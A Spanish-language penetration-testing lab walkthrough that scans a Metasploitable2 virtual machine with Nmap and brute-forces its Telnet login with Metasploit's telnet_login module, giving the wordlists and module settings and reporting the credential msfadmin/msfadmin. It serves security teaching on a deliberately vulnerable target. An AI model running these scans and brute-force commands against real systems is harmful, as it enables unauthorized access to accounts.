Explotar la vulnerabilidad del servicio Telnet con Metasploit

NmapBeginner
Practicar Ahora

Introducción

En este laboratorio, aprenderemos cómo explotar la vulnerabilidad del servicio Telnet y realizar un ataque de penetración. El escenario implica utilizar la máquina Kali Linux como máquina atacante y la máquina virtual Metasploitable2 como máquina objetivo. El objetivo es escanear la máquina objetivo en busca de vulnerabilidades, identificar la vulnerabilidad del servicio Telnet y explotarla utilizando el framework Metasploit.

Iniciar el entorno de laboratorio

En este paso, iniciaremos el entorno de laboratorio, que incluye el contenedor Kali Linux y la máquina virtual Metasploitable2.

  1. Abre una terminal xfce en la máquina host de LabEx e inicia el objetivo Metasploitable2 ejecutando el siguiente comando:
sudo virsh start Metasploitable2

Espera a que la máquina objetivo se inicie; puede tardar entre 1 y 3 minutos.

  1. Prueba la conectividad con la máquina objetivo haciendo ping:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

  1. Inicia el contenedor Kali Linux y entra en el entorno bash ejecutando:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro del contenedor Kali, prueba la conexión de red con la máquina objetivo:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

Ahora, tanto la máquina atacante como la máquina objetivo están en funcionamiento, y puedes comenzar con las pruebas de penetración.

Nota: Si sales accidentalmente del bash actual, el contenedor Kali se detendrá automáticamente. Puedes ejecutar docker run -ti --network host b5b709a49cd5 bash nuevamente en el host para iniciar un nuevo contenedor Kali y entrar en bash para continuar con el experimento.

Realizar el escaneo de vulnerabilidades

En este paso, utilizaremos Nmap para escanear la máquina objetivo en busca de puertos y servicios abiertos.

Primero, inicia la base de datos PostgreSQL, ya que Metasploit la requiere para el almacenamiento de datos:

service postgresql start
msfdb init
cd ~
msfconsole

Dentro de la consola de Metasploit, ejecuta el escaneo de Nmap contra la máquina objetivo:

nmap -sV -T4 192.168.122.102

La opción -sV escanea los puertos abiertos y muestra información detallada, mientras que -T4 establece la política de temporización del escaneo (de 0 a 5; los valores más altos son más rápidos pero generan más ruido).

Analizar los resultados del escaneo

En este paso, analizaremos los resultados del escaneo de Nmap para identificar el servicio Telnet vulnerable.

La salida del escaneo de Nmap muestra que el servicio Telnet se está ejecutando en el puerto 23 con el banner "Linux telnetd". Busquemos el módulo de Metasploit correspondiente:

search scanner/telnet

Utiliza el módulo auxiliary/scanner/telnet/telnet_login:

use auxiliary/scanner/telnet/telnet_login

Muestra las opciones del módulo:

show options

La opción requerida es RHOSTS, que especifica el host o los hosts objetivo.

Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección

Preparar el diccionario de nombres de usuario y contraseñas

En este paso, prepararemos los archivos de diccionario de nombres de usuario y contraseñas para el ataque de fuerza bruta de inicio de sesión.

Regresa a la shell del contenedor Kali antes de crear los archivos. Si aún estás dentro de msfconsole, presiona Ctrl+D para salir a la shell del contenedor. Tu prompt debería verse similar a root@...:/#.

Crea /username.txt con los siguientes nombres de usuario:

cat > /username.txt <<'EOF'
123456
admin
msfadmin
root
kali
EOF

Crea /password.txt con las siguientes contraseñas:

cat > /password.txt <<'EOF'
abc123
1234
123456
root
msfadmin
admin
toor
EOF

Estos archivos se utilizarán como diccionarios de nombres de usuario y contraseñas para el ataque de fuerza bruta.

Configurar el módulo de Metasploit

En este paso, configuraremos el módulo de Metasploit con el host objetivo, el diccionario de nombres de usuario y el diccionario de contraseñas.

En primer lugar, si no estás en la consola de Metasploit, debes iniciarla:

cd ~
msfconsole

Utiliza el módulo auxiliary/scanner/telnet/telnet_login:

use auxiliary/scanner/telnet/telnet_login

Establece el host objetivo:

set RHOSTS 192.168.122.102

Establece el archivo de diccionario de nombres de usuario:

set USER_FILE /username.txt

Establece el archivo de diccionario de contraseñas:

set PASS_FILE /password.txt

Por último, ejecuta el exploit:

exploit

Metasploit comenzará a probar diferentes combinaciones de nombres de usuario y contraseñas de los diccionarios proporcionados. Si se encuentra una credencial válida, se mostrará en verde.

En este caso, la credencial válida es msfadmin/msfadmin.

Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección

Resumen

En este laboratorio, aprendimos cómo explotar la vulnerabilidad del servicio Telnet utilizando el framework Metasploit. Comenzamos configurando el entorno de laboratorio con la máquina atacante Kali Linux y la máquina objetivo Metasploitable2. Luego, realizamos un escaneo de vulnerabilidades usando Nmap para identificar el servicio Telnet abierto. A continuación, preparamos los diccionarios de nombres de usuario y contraseñas, y configuramos el módulo de Metasploit con el host objetivo y los archivos de diccionario. Finalmente, ejecutamos el exploit y logramos obtener las credenciales de inicio de sesión de Telnet mediante fuerza bruta.

Este laboratorio proporcionó experiencia práctica en pruebas de penetración, escaneo de vulnerabilidades y el uso del framework Metasploit para explotar vulnerabilidades. Destacó la importancia de las prácticas de seguridad en las contraseñas y los riesgos potenciales de utilizar credenciales débiles o fáciles de adivinar.